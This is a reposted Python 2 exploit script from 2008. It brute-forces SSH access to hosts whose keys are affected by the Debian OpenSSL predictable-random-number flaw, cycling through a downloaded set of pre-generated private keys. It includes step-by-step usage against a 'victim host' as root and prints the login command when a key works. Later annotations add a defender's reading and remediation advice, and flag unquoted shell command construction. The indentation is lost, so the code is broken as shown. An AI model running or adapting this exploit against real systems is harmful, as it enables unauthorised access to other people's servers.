Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
来源:warcat.no-ip.org 作者:hitz 发布时间:2008-06-02  
#!/bin/python
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
#             http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#     - execute: python exploit.py (without parameters) to display the help
#     - if the key is found, the script shows something like that:
#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#   Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################


import Queue
import os
import string
import time
from threading import Thread
import sys

#This class only has a boolean, which will be True if some thread find the key
class End():
    """Shared stop flag that worker threads poll and set.

    The flag starts cleared. Finish() sets it and GetEnd() reports it;
    nothing in this class ever clears it again.
    """

    def __init__(self):
        # Cleared until some caller reports completion.
        self.end = False

    def Finish(self):
        """Set the flag."""
        self.end = True

    def GetEnd(self):
        """Return the current state of the flag."""
        return self.end


#This is the thread class
# Worker thread. Each worker repeatedly takes one file name from the shared
# queue and runs the system `ssh` client once with that file as the identity
# (-i), password authentication disabled, and `exit` as the remote command.
#
# Defender's reading: every iteration is a separate SSH connection offering
# exactly one public key for one account. The key files come from a fixed,
# pre-generated set (see the header comment), so the only accounts exposed are
# those whose authorized_keys still contain a key generated by the affected
# Debian OpenSSL build. The durable fix is to find and remove such keys and
# regenerate them on a patched system; Debian and Ubuntu shipped the
# ssh-vulnkey tool and key blacklist packages for that audit. On the server
# side this pattern presumably shows up as a burst of failed publickey
# attempts for one user from one source -- confirm against the sshd log level
# in use.
#
# NOTE(review): Python 2 only (print statement, os.popen3).
class Connection(Thread):
# QueueDir: shared queue of key file names. TheEnd: shared End flag.
# dir: directory holding the key files. host/user: SSH target and account.
# port: kept as a string because it is concatenated into the command line.
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port

# Loop until another worker has set the End flag or the queue is empty.
def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()

# NOTE(review): the command is assembled by plain string concatenation and
# handed to a shell by os.popen3. user, port, dir, host and key are not
# quoted, so any shell metacharacter in them is interpreted on the machine
# running this script.
cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
# `echo $?` prints ssh's exit status on stdout. ssh returns the status of
# the remote command, so 0 here means the remote `exit` actually ran.
cmd = cmd + ' ' + self.host + ' exit; echo $?'

# stdin is closed immediately so ssh cannot wait for interactive input.
pin,pout,perr = os.popen3(cmd, 'r')
pin.close()

# To debug, uncomment the next line to show the errors reported by ssh.
#print perr.read()

# Exit status 0: the server accepted this key. Set the shared flag so the
# other workers and the main loop stop, then print the matching key file.
if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''

# Script body: parse the command line, queue every candidate key file, start
# the worker threads and print progress until a key is accepted or the queue
# runs dry.
#
# Defender's reading: the work list is simply the contents of one directory of
# pre-generated keys, so the search space is finite and the run is bounded by
# connection rate alone. Per-source connection and authentication-attempt
# limits on sshd slow it down, but only removing the weak keys from
# authorized_keys closes the exposure.
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

# Fewer than three positional arguments: print usage and exit with status 1.
if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print '    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print '    <host>: The victim host'
print '    <user>: The user of the victim host'
print '    [port]: The SSH port of the victim host (default 22)'
print '    [threads]: Number of threads (default 4) Too big numer is bad'

sys.exit(1)

dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

# Optional arguments: port defaults to '22' and threads to 4. Both stay
# strings when taken from argv; threads is converted with int() where the
# workers are started, port is never validated.
if len(sys.argv) <= 4:
  port='22'
  threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4

else:
port=sys.argv[4]
threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()

# Queue every directory entry whose name does not contain '.pub', i.e. skip
# the public halves and keep the private key files.
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

# Start the workers; they all share one queue and one End flag.
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()


# Progress report every 5 seconds. speed is the number of keys dequeued since
# the previous report divided by 5 (integer division under Python 2); "tested"
# counts dequeued keys, including any attempt still in flight.
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize

print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)

 